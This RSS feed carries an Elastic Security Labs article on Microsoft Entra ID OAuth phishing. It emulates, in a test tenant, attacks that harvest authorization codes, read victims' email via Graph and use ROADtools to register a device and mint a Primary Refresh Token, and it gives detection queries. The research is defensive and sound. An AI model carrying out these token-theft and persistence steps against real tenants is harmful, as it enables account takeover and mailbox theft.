<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Elastic Security Labs - Articles by Terrance DeJesus</title>
        <link>https://www.elastic.co/es/security-labs</link>
        <description>Trusted security news &amp; research from the team at Elastic.</description>
        <lastBuildDate>Thu, 12 Mar 2026 14:25:51 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <image>
            <title>Elastic Security Labs - Articles by Terrance DeJesus</title>
            <url>https://www.elastic.co/es/security-labs/assets/security-labs-thumbnail.png</url>
            <link>https://www.elastic.co/es/security-labs</link>
        </image>
        <copyright>© 2026. Elasticsearch B.V. All Rights Reserved</copyright>
        <item>
            <title><![CDATA[Microsoft Entra ID OAuth Phishing and Detections]]></title>
            <link>https://www.elastic.co/es/security-labs/entra-id-oauth-phishing-detection</link>
            <guid>entra-id-oauth-phishing-detection</guid>
            <pubDate>Wed, 25 Jun 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[This article explores OAuth phishing and token-based abuse in Microsoft Entra ID. Through emulation and analysis of tokens, scope, and device behavior during sign-in activity, we surface high-fidelity signals defenders can use to detect and hunt for OAuth misuse.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>Members of the Threat Research and Detection Engineering (TRADE) team at Elastic have recently turned their attention to an emerging class of threats targeting OAuth workflows in Microsoft Entra ID (previously Azure AD). This research was inspired by Volexity's recent blog, <a href="https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/">Phishing for Codes: Russian Threat Actors Target Microsoft 365 OAuth Workflows</a>, which attributes a sophisticated OAuth phishing campaign against NGOs to the threat actor designated <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/uta0352">UTA0352</a>.</p>
<p>Volexity's investigation presents compelling forensic evidence of how attackers abused trusted first-party Microsoft applications to bypass traditional defenses. Using legitimate OAuth flows and the open-source tool <a href="https://github.com/dirkjanm/ROADtools">ROADtools</a>, the actors crafted customized Microsoft authentication URLs, harvested security tokens and leveraged them to impersonate users, elevate privilege, and exfiltrate data via Microsoft Graph — including downloading Outlook emails and accessing SharePoint sites.</p>
<p>While their report thoroughly documents the <strong>what</strong> of the attack, our team at Elastic focused on understanding the <strong>how</strong>. We emulated the attack chain in a controlled environment to explore the mechanics of token abuse, device registration, and token enrichment firsthand. This hands-on experimentation yielded deeper insights into the inner workings of Microsoft's OAuth implementation, the practical use of ROADtools, recommended mitigations, and most importantly, effective detection strategies to identify and respond to similar activity.</p>
<h1>OAuth in Microsoft Entra ID</h1>
<p>Microsoft Entra ID implements OAuth 2.0 to enable delegated access to Microsoft 365 services like Outlook, SharePoint, and Graph API. While the OAuth specification is standardized (<a href="https://datatracker.ietf.org/doc/html/rfc6749">RFC6749</a>), Entra ID introduces unique behaviors and token types that influence how delegated access works and how adversaries exploit them.</p>
<p>In delegated access, an application is authorized to act on behalf of a signed-in user, constrained by scopes (permissions) the app requests and the user or admin consents to. This model is common in enterprise environments where apps retrieve a user's emails, files, or directory data without prompting for credentials each time.</p>
<p>A typical delegated authorization flow includes:</p>
<p><strong>Authorization request (OAuth 2.0 Authorization Code Grant)</strong>: The app requests access to a resource (e.g., Graph) with specific scopes (e.g., Mail.Read, offline_access). These are added as parameters to the URI.</p>
<ul>
<li><em>client_id</em>: The application’s ID (e.g., VSCode)</li>
<li><em>response_type</em>: Determines the OAuth grant workflow (e.g., device code, authorization code)</li>
<li><em>scope</em>: Permissions requested for the target resource (e.g., <em>Mail.Read, offline_access</em>)</li>
<li><em>redirect_uri</em>: Where the authorization code is sent</li>
<li><em>state</em>: CSRF protection</li>
<li><em>login_hint</em>: Pre-fills the username</li>
</ul>
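<p>To make these parameters concrete, the authorization request can be sketched in Python using only the standard library (the helper name and values below are illustrative, not part of any tooling discussed here):</p>
<pre><code class="language-python">from urllib.parse import urlencode

def build_authorize_url(client_id, scope, redirect_uri, login_hint, state):
    # Illustrative helper: assembles an Entra ID v2.0 authorization request URL.
    base = 'https://login.microsoftonline.com/organizations/oauth2/v2.0/authorize'
    params = {
        'client_id': client_id,
        'response_type': 'code',   # authorization code grant
        'scope': scope,
        'redirect_uri': redirect_uri,
        'state': state,            # CSRF protection
        'login_hint': login_hint,  # pre-fills the username
    }
    return base + '?' + urlencode(params)
</code></pre>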
<p><strong>User authentication (OpenID Connect)</strong>: Entra ID authenticates the user via policy (password, MFA, device trust).</p>
<ul>
<li>Single-Factor Authentication (SFA)</li>
<li>Multi-factor Authentication (MFA)</li>
<li>Device Trust (Hybrid Join, Intune compliance)</li>
<li>Conditional Access Policies (CAP)</li>
<li>Single Sign-On (SSO)</li>
</ul>
<p><strong>Consent:</strong> Consent governs whether the app can receive an authorization code and what scopes are permitted.</p>
<ul>
<li>User-consentable scopes (e.g., <em>Mail.Read, offline_access</em>)</li>
<li>Admin-consent scopes (e.g., <em>Directory.ReadWrite</em>) require elevated approval.</li>
</ul>
<p><strong>Token issuance</strong>: The app receives an authorization code, then redeems it for:</p>
<ul>
<li>Access Token – short-lived token used to call APIs like Graph.</li>
<li>Refresh Token (RT) – longer-lived token to obtain new access tokens silently.</li>
<li>ID Token – Describes the authenticated user; present in OpenID Connect flows.</li>
<li>(Optional) Primary Refresh Token: If the user is on a domain-joined or registered device, a Primary Refresh Token (PRT) may enable silent SSO and additional token flows without user interaction.</li>
<li><strong>Token claims:</strong> Claims are key-value pairs embedded in JWT tokens that describe the user, app, device, scopes and context of the authentication.</li>
</ul>
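<p>As an illustration of why refresh tokens matter, the silent renewal described above boils down to a simple form POST against the token endpoint. A minimal sketch (hypothetical helper; it only builds the request body and does not send it):</p>
<pre><code class="language-python">def build_refresh_request(client_id, refresh_token, scope):
    # Illustrative sketch: form body for the OAuth 2.0 refresh_token grant.
    # POSTing this to the token endpoint yields a fresh access token
    # (and usually a rotated refresh token) with no user interaction.
    token_url = 'https://login.microsoftonline.com/organizations/oauth2/v2.0/token'
    body = {
        'client_id': client_id,
        'grant_type': 'refresh_token',
        'refresh_token': refresh_token,
        'scope': scope,
    }
    return token_url, body
</code></pre>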
<h1>What Defines an MSFT OAuth Phishing URL</h1>
<p>Before diving into key findings from Volexity's report that help shape our detection strategy, it's important to break down what exactly defines a Microsoft OAuth phishing URL.</p>
<p>As described earlier, Microsoft Entra ID relies on these URLs to determine which application (client) is requesting access, on behalf of which user principal, to what resource, and with what permissions. Much of this context is embedded directly in the query parameters of the OAuth authorization request, making them a critical source of metadata for both adversaries and defenders.</p>
<p>Here's an example of a phishing URL aligned with the authorization code grant flow, adapted from Volexity's blog:</p>
<pre><code>https://login.microsoftonline[.]com/organizations/oauth2/v2.0/authorize?state=https://mae.gov[.]ro/[REMOVED]&amp;client_id=aebc6443-996d-45c2-90f0-388ff96faa56&amp;scope=https://graph.microsoft.com/.default&amp;response_type=code&amp;redirect_uri=https://insiders.vscode.dev/redirect&amp;login_hint=&lt;EMAIL HERE&gt;
</code></pre>
<p>Let's break down some of the key components:</p>
<ul>
<li>login.microsoftonline.com – The global Microsoft Entra ID authentication endpoint.</li>
<li>/oauth2/v2.0/authorize - MSFT Entra ID OAuth v2.0 endpoint for authorization workflows</li>
<li>state – Optional value used to prevent CSRF and maintain application state. Sometimes abused to obfuscate phishing redirections.</li>
<li>client_id – The application ID making the request. This could belong to Microsoft first-party apps (like VSCode, Teams) or malicious third-party apps registered by adversaries.</li>
<li>scope – Defines the permissions the application is requesting (e.g., Mail.Read, offline_access). The .default scope is often used for client credential flows to get pre-consented permissions.</li>
<li>response_type=code – Indicates the flow is requesting an authorization code, which can later be exchanged for an access and/or refresh token.</li>
<li>redirect_uri – Where Entra ID will send the response after the user authenticates. The attacker either controls this URI to collect the authorization code directly, or uses a valid Microsoft-managed URI and has the victim share the code.</li>
<li>login_hint – Specifies the target user (e.g., alice @ tenant.onmicrosoft.com). Often pre-filled to lower friction during phishing.</li>
</ul>
<p>Note: While this example illustrates a common Microsoft Entra ID OAuth phishing URL, there are many variations. Adversaries may adjust parameters such as the client ID, scopes, grant types or redirect URIs depending on their specific objectives, whether it's to gain persistent access, exfiltrate emails, or escalate privileges via broader consent grants.</p>
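<p>For defenders, these same query parameters can be triaged programmatically. The sketch below is illustrative: the flagged client and resource IDs are the ones discussed in this post, and the heuristics are examples rather than an exhaustive detection:</p>
<pre><code class="language-python">from urllib.parse import urlparse, parse_qs

FIRST_PARTY_BROKER = '29d9ed98-a469-4536-ade2-f981bc1d605e'  # Microsoft Auth Broker
DRS_RESOURCE = '01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9'        # Device Registration Service

def triage_oauth_url(url):
    # Illustrative heuristics: flag authorize URLs whose parameter
    # combination matches the phishing patterns described above.
    q = parse_qs(urlparse(url).query)
    flags = []
    if q.get('client_id', [''])[0] == FIRST_PARTY_BROKER:
        flags.append('auth-broker client_id')
    if q.get('resource', [''])[0] == DRS_RESOURCE:
        flags.append('device-registration resource')
    if q.get('login_hint'):
        flags.append('pre-filled login_hint')
    state = q.get('state', [''])[0]
    if state.startswith('http'):
        flags.append('URL smuggled in state parameter')
    return flags
</code></pre>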
<h2>Why Does This Matter?</h2>
<p>Because these parameters are customizable, adversaries can easily swap out values to suit their operation. For example:</p>
<ul>
<li>They might use a legitimate Microsoft client ID to blend in with benign applications.</li>
<li>They may use a .default scope to bypass specific consent prompts.</li>
<li>They’ll point the redirect_uri to a site under their control to collect the authorization code.</li>
<li>They can target specific user principals they may have identified during reconnaissance.</li>
<li>They can adjust permissions to target resources based on their operational needs.</li>
</ul>
<p>Once a target authenticates, the goal is simple – obtain an authorization code. This code is then exchanged (often using tools like ROADtools) for a refresh token and/or access token, enabling the attacker to make Graph API calls or pivot into other Microsoft 365 services, all without further user interaction.</p>
<h1>Abstraction of Volexity's Key Findings</h1>
<p>For threat detection, it is critical to understand protocols like OAuth, their workflow implementation in Microsoft Entra ID, and contextual metadata about the behaviors and steps taken by the adversary during this operation.</p>
<p>From Volexity's investigation and research, we can key in on the different variations of OAuth phishing reported. We decided to break these down for easier understanding:</p>
<p><strong>OAuth Phishing To Access Graph API as VSCode Client On-Behalf-Of Target User Principal</strong>: These URLs are similar to our example in “What Defines an MSFT OAuth Phishing URL” – the end goal being an access token to Graph API with default permissions.</p>
<ul>
<li>OAuth phishing URLs were custom, pointing to &quot;authorize&quot; endpoint</li>
<li>Client IDs were specifically VSCode (&quot;aebc6443-996d-45c2-90f0-388ff96faa56&quot;)</li>
<li>Resource/Scope was MSFT Graph (&quot;<a href="https://graph.microsoft.com/.default">https://graph.microsoft.com/.default</a>&quot;) with .default permissions</li>
<li>Token grant flows were auth code (response_type=code)</li>
<li>Redirect URIs were for legitimate MSFT domains (insiders[.]vscode[.]dev or vscode-redirect[.]azurewebsites[.]net)</li>
<li>Login hints were the specific user principal being targeted (not service principals)</li>
<li>Adversary required the target to open the URL, authenticate and share the authorization code (1.AXg….)</li>
</ul>
<p>From here, the adversary would be able to make a request to MSFT's OAuth token endpoint (<em><a href="https://login.microsoftonline.com/%5Btenant_id%5D/oauth2/v2.0/token">https://login.microsoftonline.com/[tenant_id]/oauth2/v2.0/token</a></em>) and exchange the authorization code for an access token. This is enough to allow the adversary to access Graph API and the resources normally available to the user. These indicators will be crucial in shaping our detection and hunting strategies later in this blog.</p>
<p><strong>OAuth Phishing for Device Registration as MSFT Auth Broker</strong>: These URLs are unique as they are chained with subsequent ROADtools usage to register a virtual device, exchange an RT for a PRT, and require PRT enrichment to accomplish email access via Graph API and SharePoint access.</p>
<ul>
<li>OAuth phishing URLs were custom, pointing to authorize (<em><a href="https://login.microsoftonline.com/%5Btenant_id%5D/oauth2/v2.0/authorize">https://login.microsoftonline.com/[tenant_id]/oauth2/v2.0/authorize</a></em>) endpoint</li>
<li>Client IDs were specifically MSFT Authentication Broker (&quot;29d9ed98-a469-4536-ade2-f981bc1d605e&quot;)</li>
<li>Resource/Scope was Device Registration Service (DRS) (&quot;01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9&quot;)</li>
<li>Token grant flows were auth code (response_type=code)</li>
<li>Redirect URI includes cloud-based domain join endpoint (typically used during Windows setup or Autopilot)</li>
<li>Login hint contains user principal email address (Target)</li>
<li>Request is ultimately for an ADRS token</li>
</ul>
<p>If the user is phished and opens the URL, authenticating will provide an ADRS token that is required for the adversary to register a device and subsequently obtain a PRT with the device’s private key and PEM file.</p>
<p>Volexity's blog also includes additional information about tracking the activity of the compromised identity via the registered device ID, as well as post-compromise activity following an approved 2FA request, which allowed the adversary to download the target's email with a session tied to the newly registered device.</p>
<p>With this understanding of each phishing attempt, our next goal is to replicate this in our own MSFT tenant as accurately as possible to gather data for plausible detections.</p>
<h1>Our Emulation Efforts</h1>
<p>Alright – so at this point, we’ve covered the fundamentals of OAuth and how Microsoft Entra ID implements it. We broke down what defines a Microsoft OAuth phishing URL, decoded its critical parameters, and pulled key insights from Volexity's excellent investigation to identify indicators aligned with these phishing workflows.</p>
<p>But theory and a glimpse into Volexity's notebook only take us so far.</p>
<p>To truly understand the attacker's perspective – the full chain of execution, tooling quirks, subtle pitfalls, and opportunities for abuse – we decided to go hands-on with whitebox testing. We recreated the OAuth phishing process in our own tenant, emulating everything from token harvesting to resource access. The goal? Go beyond static indicators and surface the behavioral breadcrumbs that defenders can reliably detect.</p>
<p>Let's get into it.</p>
<h2>Prerequisites</h2>
<p>For starters, it is good to share some details about our threat research and detection environment in Azure.</p>
<ul>
<li>Established Azure tenant: TENANT.onmicrosoft.com</li>
<li>Established Sharepoint Domain: DOMAIN.sharepoint.com</li>
<li>Native IdP Microsoft Entra ID – Enabling our IAM</li>
<li>Microsoft 365 Licenses (P2) for All Users</li>
<li>Azure Activity Logs Streaming to EventHub</li>
<li>Microsoft Entra ID Sign-In Logs Streaming to EventHub</li>
<li>Microsoft Entra ID Audit Logs Streaming to EventHub</li>
<li>Microsoft Graph Audit Logs Streaming to EventHub</li>
<li>Microsoft 365 Audit Logs Streaming to EventHub</li>
<li>Elastic Azure and M365 Integration Enabled for Log Digestion from EventHub</li>
<li>Basic Admin User Enabled with CAP Requiring MFA</li>
<li>MSFT Authenticator App on Mobile for 2FA Emulation</li>
<li>Windows 10 Desktop with NordVPN (Adversary Box)</li>
<li>macOS endpoint (Victim box)</li>
</ul>
<p>Note that while we could follow the workflows from a single endpoint, we often need data reflecting separate source addresses to develop detection variations such as impossible travel.</p>
<h1>Scenario 1: OAuth Phishing as VSCode Client</h1>
<h2>Emulation</h2>
<p>To emulate the phishing technique documented by Volexity, we built a Python script to generate an OAuth 2.0 authorization URL using Microsoft Entra ID. The URL initiates an authorization code grant flow, impersonating the first-party Visual Studio Code app to request delegated access to the Microsoft Graph API.</p>
<p>We configured the URL with the following parameters:</p>
<pre><code class="language-json">{
  &quot;client_id&quot;: &quot;aebc6443-996d-45c2-90f0-388ff96faa56&quot;,
  &quot;response_type&quot;: &quot;code&quot;,
  &quot;redirect_uri&quot;: &quot;https://insiders.vscode.dev/redirect&quot;,
  &quot;scope&quot;: &quot;https://graph.microsoft.com/.default&quot;,
  &quot;login_hint&quot;: &quot;user @ tenant.onmicrosoft.com&quot;,
  &quot;prompt&quot;: &quot;select_account&quot;,
  &quot;state&quot;: &quot;nothingtoseehere&quot;
}
</code></pre>
<p><em>Figure 1: Parameters for OAuth Phishing URL</em></p>
<p>This URL is shared with the target (in our case, a macOS test user). When opened, it authenticates the user and completes the OAuth workflow. Using browser developer tools, we capture the authorization code returned in the redirect URI – exactly what the attackers asked their victims to send back.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image7.png" alt="Figure 2: Redirect query string parameters with authorization code after authentication" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image2.png" alt="Figure 3: Python script execution for generating OAuth phishing URL and exchanging auth code for Token" /></p>
<p>After receiving the code, we issue a POST request to:</p>
<pre><code class="language-json">{token_url: &quot;https://login.microsoftonline.com/organizations/oauth2/v2.0/token&quot;}
</code></pre>
<p>This exchange uses the authorization_code grant type, passing the code, client ID, and redirect URI. Microsoft returns an access token, but no refresh token. Why is that?</p>
<p>The scope <a href="https://graph.microsoft.com/.default">https://graph.microsoft.com/.default</a> instructs Microsoft to issue a bearer token for all Graph permissions already granted to the VSCode app on behalf of the user. This is a static scope, pulled from the app registration; it does not include dynamic scopes like Mail.Read or offline_access.</p>
<p>Microsoft's documentation states:</p>
<p>“<em>Clients can’t combine static (.default) consent and dynamic consent in a single request.</em>”</p>
<p>Therefore, trying to include offline_access alongside <em>.default</em> results in an error. If the attacker wants a refresh token, they must avoid <em>.default</em> and instead explicitly request <em>offline_access</em> and the required delegated scopes (e.g., Mail.Read) – assuming the app registration supports them.</p>
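<p>Putting this together, the code-for-token exchange boils down to a form POST. A minimal sketch of the request body (hypothetical helper; an HTTP client would be needed to actually send it to the token endpoint):</p>
<pre><code class="language-python">def build_code_exchange(client_id, code, redirect_uri, scope):
    # Illustrative sketch of the authorization_code grant body.
    # POSTing this form to the token endpoint returns an access token;
    # with the static .default scope, no refresh token is issued.
    return {
        'client_id': client_id,
        'grant_type': 'authorization_code',
        'code': code,
        'redirect_uri': redirect_uri,
        'scope': scope,
    }
</code></pre>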
<p>With the access token in hand, we pivoted to a second script to interact with the Microsoft Graph API. The goal: extract email messages from the victim’s account, just as the attacker would.</p>
<p>To do this, we included the access token as a Bearer JWT in the authorization header and made a GET request to the following endpoint:</p>
<pre><code class="language-json">{graph_url: &quot;https://graph.microsoft.com/v1.0/me/messages&quot;}
</code></pre>
<p>The response returns a JSON array of email objects. From here, we simply iterate through the results and parse out useful metadata such as sender, subject, and received time.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image4.png" alt="Figure 4: Leveraging access token to access user emails via Graph API" /></p>
<p>To test the token’s broader privileges, we also attempted to enumerate SharePoint sites using:</p>
<pre><code class="language-json">{graph_search_url: &quot;https://graph.microsoft.com/v1.0/sites?search=*&quot;}
</code></pre>
<p>The request failed with an access denied error – which leads us to an important question: why did email access work, but SharePoint access did not? The reason is that the first-party client (VSCode: aebc6443-996d-45c2-90f0-388ff96faa56) does not have default delegated Graph permissions for SharePoint, as predefined by Microsoft. Therefore, we know the adversary is limited in what they can access.</p>
<p>To ensure this was accurate, we decoded the access token to inspect the scp claim associated with VSCode's <em>.default</em> permissions to Graph – verifying that Microsoft grants no <em>Sites.*</em> permissions.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image11.png" alt="Figure 5: Decoded Entra ID Access Token" /></p>
<p>This is only one of the variations described by Volexity, but it helps us understand the adversary's behind-the-scenes process, as well as the resources, OAuth mechanics, and more within Microsoft Entra ID.</p>
<p>With the emulation complete, we now turn to identifying high-fidelity signals that are viable for SIEM detection and threat hunting. Our focus is on behavioral observables in Microsoft Entra ID and Microsoft Graph logs.</p>
<h2>Detection</h2>
<h4>Signal 1 - Microsoft Entra ID OAuth Phishing as Visual Studio Code Client</h4>
<p>A successful OAuth 2.0 (authorization) and OpenID Connect (authentication) flow was completed using the first-party Microsoft application Visual Studio Code (VSCode). The sign-in occurred on behalf of the phished user principal, resulting in delegated access to Microsoft Graph with <em>.default</em> permissions.</p>
<pre><code>event.dataset: &quot;azure.signinlogs&quot; and
event.action: &quot;Sign-in activity&quot; and
event.outcome: &quot;success&quot; and
azure.signinlogs.properties.user_type: &quot;Member&quot; and
azure.signinlogs.properties.authentication_processing_details: *Oauth* and
azure.signinlogs.category: &quot;NonInteractiveUserSignInLogs&quot; and
(
  azure.signinlogs.properties.resource_display_name: &quot;Microsoft Graph&quot; or
  azure.signinlogs.properties.resource_id: &quot;00000003-0000-0000-c000-000000000000&quot;
) and (
  azure.signinlogs.properties.app_id: &quot;aebc6443-996d-45c2-90f0-388ff96faa56&quot; or
  azure.signinlogs.properties.app_display_name: &quot;Visual Studio Code&quot;
)
</code></pre>
<h4>Signal 2 - Microsoft Entra Session Reuse with Suspicious Graph Access</h4>
<p>While traditional query languages like KQL are excellent for filtering and visualizing individual log events, they struggle when a detection relies on correlating multiple records across datasets, time, and identifiers. This is where ES|QL (Elasticsearch Query Language) becomes essential. These types of multi-event correlations, temporal logic, and field normalization are difficult or entirely impossible in static filter-based query languages like KQL without writing multiple disjointed queries and manually correlating them after the fact.</p>
<p>This detection relies on correlating multiple events that happen close together but come from different data sources – namely sign-in logs and Microsoft Graph activity. The goal is to find suspicious reuse of the same session ID across multiple IPs, potentially indicating session hijacking or token abuse. For the sake of space in this publication, you can view the actual detection rule in the Detection Rules section. To better illustrate the flow and meaning of the query, the diagram below illustrates it at a higher level.</p>
<pre><code>[ FROM logs-azure.* ]
        |
        |  ← Pulls events from all relevant Microsoft Cloud datasets:
        |     - azure.signinlogs (authentication)
        |     - azure.graphactivitylogs (resource access)
        ↓
[ WHERE session_id IS NOT NULL AND IP NOT MICROSOFT ASN ]
        |
        |  ← Filters out Microsoft-owned infrastructure (e.g., internal proxy,
        |     Graph API relays) using ASN checks.
        |  ← Ensures session ID exists so events can be correlated together.
        ↓
[ EVAL session_id, event_type, time_window, etc. ]
        |
        |  ← Normalizes key fields across datasets:
        |     - session_id (from signin or Graph)
        |     - user ID, app ID, event type (&quot;signin&quot; or &quot;graph&quot;)
        |  ← Buckets events into 5-minute windows using DATE_TRUNC()
        ↓
[ KEEP selected fields ]
        |
        |  ← Retains only what's needed:
        |     session_id, timestamp, IP, user, client ID, etc.
        ↓
[ STATS BY session_id + time_window ]
        |
        |  ← Groups by session and time window to compute:
        |     - unique IPs used
        |     - apps involved
        |     - first and last timestamps
        |     - whether both signin and graph occurred
        ↓
[ EVAL time_diff + signin_to_graph_delay ]
        |
        |  ← Calculates:
        |     - time_diff: full session duration
        |     - delay: gap between signin and Graph access
        ↓
[ WHERE types_count &gt; 1 AND unique_ips &gt; 1 AND delay &lt;= 5 ]
        |
        |  ← Flags sessions where:
        |     - multiple event types (signin + graph)
        |     - multiple IPs used
        |     - all occurred within 5 minutes
        ↓
[ Output = Suspicious Session Reuse Detected ]
</code></pre>
<h4>Signal 3 - Microsoft Entra ID Concurrent Sign-Ins with Suspicious Properties</h4>
<p>This detection identifies suspicious sign-ins in Microsoft Entra ID where a user authenticates using the device code flow without MFA or sign-ins using the VSCode client. When the same identity signs in from two or more distinct IPs within a short time window using either method, it may indicate token replay, OAuth phishing, or adversary-in-the-middle (AitM) activity.</p>
<pre><code>[ FROM logs-azure.signinlogs* ]
        |
        |  ← Pulls only Microsoft Entra ID sign-in logs
        ↓
[ WHERE @timestamp &gt; NOW() - 1h AND event.outcome == &quot;success&quot; ]
        |
        |  ← Filters to the last hour and keeps only successful sign-ins
        ↓
[ WHERE source.ip IS NOT NULL AND identity IS NOT NULL ]
        |
        |  ← Ensures the sign-in is tied to a user and IP for correlation
        ↓
[ KEEP fields: identity, app_id, auth_protocol, IP, etc. ]
        |
        |  ← Retains app/client, IP, auth method, and resource info
        ↓
[ EVAL detection flags ]
        |
        |  ← Labels events as:
        |     - device_code: if MFA not required
        |     - visual_studio: if VS Code client used
        |     - other: everything else
        ↓
[ STATS BY identity ]
        |
        |  ← Aggregates all sign-ins per user, calculates:
        |     - IP count
        |     - Device Code or VSCode usage
        |     - App/client/resource details
        ↓
[ WHERE src_ip &gt;= 2 AND (device_code_count &gt; 0 OR vsc &gt; 0) ]
        |
        |  ← Flags users with:
        |     - Sign-ins from multiple IPs
        |     - And either:
        |         - Device Code w/o MFA
        |         - Visual Studio Code app
        ↓
[ Output = Potential OAuth Phishing or Token Misuse ]
</code></pre>
<p>While this variation of OAuth phishing lacks the full persistence offered by refresh tokens or PRTs, it still provides adversaries with valuable one-time access to sensitive user data – such as emails – through legitimate channels. This exercise helps us understand the limitations and capabilities of static <em>.default</em> scopes, the influence of app registrations, and how Microsoft Graph plays a pivotal role in post-authentication. It also reinforces a broader lesson: not all OAuth phishing attacks are created equal. Some aim for longevity (as we will see later) through refresh tokens or device registration, while others focus on immediate data theft via first-party clients. Understanding the nuances is essential for accurate detection logic.</p>
<h1>Scenario 2: OAuth Phishing for Device Registration</h1>
<p>As we stated earlier – Volexity also reported a separate phishing playbook targeting victims, this time with the goal of registering a virtual device and obtaining a PRT. While this approach requires more steps from the adversary, the payoff is a token-granting token that offers far more utility for completing their operations. For our emulation efforts, we needed to expand our toolset and rely on ROADtools, just as the adversary did, to remain accurate; however, several other Python scripts were written for the initial phishing and post-compromise actions.</p>
<h2>Emulation</h2>
<p>Starting with the initial phishing, we adjusted our Python script to craft a different OAuth URL that would be sent to our victim. This time, the focus was on our first-party client ID being the Microsoft Authentication Broker, requesting a refresh token with <em>offline_access</em> and redirecting to Entra ID’s cloud domain device joining endpoint URI.</p>
<pre><code class="language-json">{
  &quot;client_id&quot;: &quot;29d9ed98-a469-4536-ade2-f981bc1d605e&quot;,
  &quot;response_type&quot;: &quot;code&quot;,
  &quot;response_mode&quot;: &quot;query&quot;,
  &quot;redirect_uri&quot;: &quot;https://login.microsoftonline.com/WebApp/CloudDomainJoin/8&quot;,
  &quot;resource&quot;: &quot;01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9&quot;,
  &quot;state&quot;: &quot;nothingtoseehere&quot;
}
</code></pre>
<p>If successful and our victim authenticates, the OAuth workflow will complete and the user will be redirected to the specified URI with an appended authorization code in the query parameters. Again, this code is the critical piece: it must be shared back with the adversary in order to exchange it for tokens. In our case, once the phishing URL is opened and the target authenticates, we capture the authorization code embedded in the redirect and use it to request tokens from the Microsoft Entra ID token endpoint.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image5.png" alt="Figure 6: Microsoft Authentication Broker OAuth Phishing and token exchange with custom Python script" /></p>
<p>Now, here's where it gets interesting. In response to the token request, we receive three types of tokens: an access token, a refresh token, and an ID token. You might be asking why we get more than just an access token. The answer lies in the scopes we initially requested: <em>openid</em>, <em>offline_access</em>, and <em>profile</em>.</p>
<ul>
<li><em>openid</em> grants us an ID token, which is part of the OpenID Connect layer and confirms the identity of the user — this is your authentication (authN) artifact.</li>
<li><em>offline_access</em> provides a refresh token, enabling us to maintain a session and request new access tokens without requiring re-authentication; this supports persistent access and is critical for our use with ROADtx.</li>
<li>And the access token itself is used to authorize requests to protected APIs like Microsoft Graph; this represents authorization (authZ).</li>
</ul>
<p>With these three tokens, we have everything: authentication, authorization, and long-term session continuity. That’s enough to shift from a simple OAuth phishing play into a more persistent foothold — like registering a new device in Microsoft Entra ID.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image10.png" alt="Figure 7: Captured JWT access, refresh and id token after exchange with authorization code" /></p>
<p>Now let’s connect the dots. A PRT requires registration of a valid device, one that Entra ID recognizes via a device certificate and private key. This is where ROADtx comes into play. Because our initial OAuth phishing impersonated a joined device flow, and the client used was the Microsoft Authentication Broker (a first-party client that interacts with the Device Registration Service), we already have the right access token in hand to interact with DRS. Notice in our returned object the scope is <em>adrs_access</em> which indicates Azure DRS access and is important for detections later.</p>
<p>From here, we simply drop the JSON object received from our token exchange into the <em>.roadtools_auth</em> file. This file is natively consumed by ROADtools, which uses the stored tokens to perform the device registration, completing the adversary’s move into persistence and setting the stage for obtaining a valid PRT.</p>
<p>After obtaining the tokens, we prep them for ROADtx by reformatting the JSON. ROADtx expects keys in camelCase, and we must also include the Microsoft Authentication Broker’s client ID as <em>_clientId</em>. This setup allows us to run the <em>refreshtokento</em> command, which takes our refresh token and exchanges it for a new JWT scoped to the DRS — specifically, the service principal <em>urn:ms-drs:enterpriseregistration.windows.net</em>.</p>
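<p>The reformatting step can be sketched as follows. This is an illustration under stated assumptions: the exact keys ROADtools expects may differ, but it shows the transformation described above (snake_case token-response keys to camelCase, plus the broker's client ID under <em>_clientId</em>).</p>

```python
# Hedged sketch: reshape a token response into the camelCase layout that
# ROADtools reads from its auth file. Field names here are illustrative.
import json

def snake_to_camel(key: str) -> str:
    head, *rest = key.split("_")
    return head + "".join(part.capitalize() for part in rest)

def to_roadtools_auth(token_response: dict, client_id: str) -> str:
    reshaped = {snake_to_camel(k): v for k, v in token_response.items()}
    reshaped["_clientId"] = client_id  # Microsoft Authentication Broker client ID
    return json.dumps(reshaped, indent=2)

token_response = {
    "access_token": "EXAMPLE_JWT",
    "refresh_token": "EXAMPLE_RT",
    "token_type": "Bearer",
}
blob = to_roadtools_auth(token_response, "29d9ed98-a469-4536-ade2-f981bc1d605e")
```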
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image1.png" alt="Figure 8: New authentication material from “refreshtokento” command for DRS as Microsoft Authentication Broker" /></p>
<p>Once that’s in place, we use the device command to simulate a new device registration. This operation doesn’t require any actual virtual machine or physical host because it’s a backend registration that simply creates an entry in Entra ID. Upon success, we’re issued a valid device ID, PEM-encoded certificate, and private key — all of which are required to simulate a valid hybrid-joined device in the Microsoft ecosystem.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image9.png" alt="Figure 9: “device” command output from registering a device and receiving a PEM certificate and private key" /></p>
<p>With our device identity established, we invoke the <em>prt</em> command. This uses the refresh token, device certificate, and private key to mint a new PRT — a highly privileged credential that effectively ties together user and device trust in Microsoft Entra ID.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/image3.png" alt="Figure 10: “prt” command with refresh token, PEM certificate and private key to obtain a PRT" /></p>
<p>And just like that — voilà! — we have a PRT.</p>
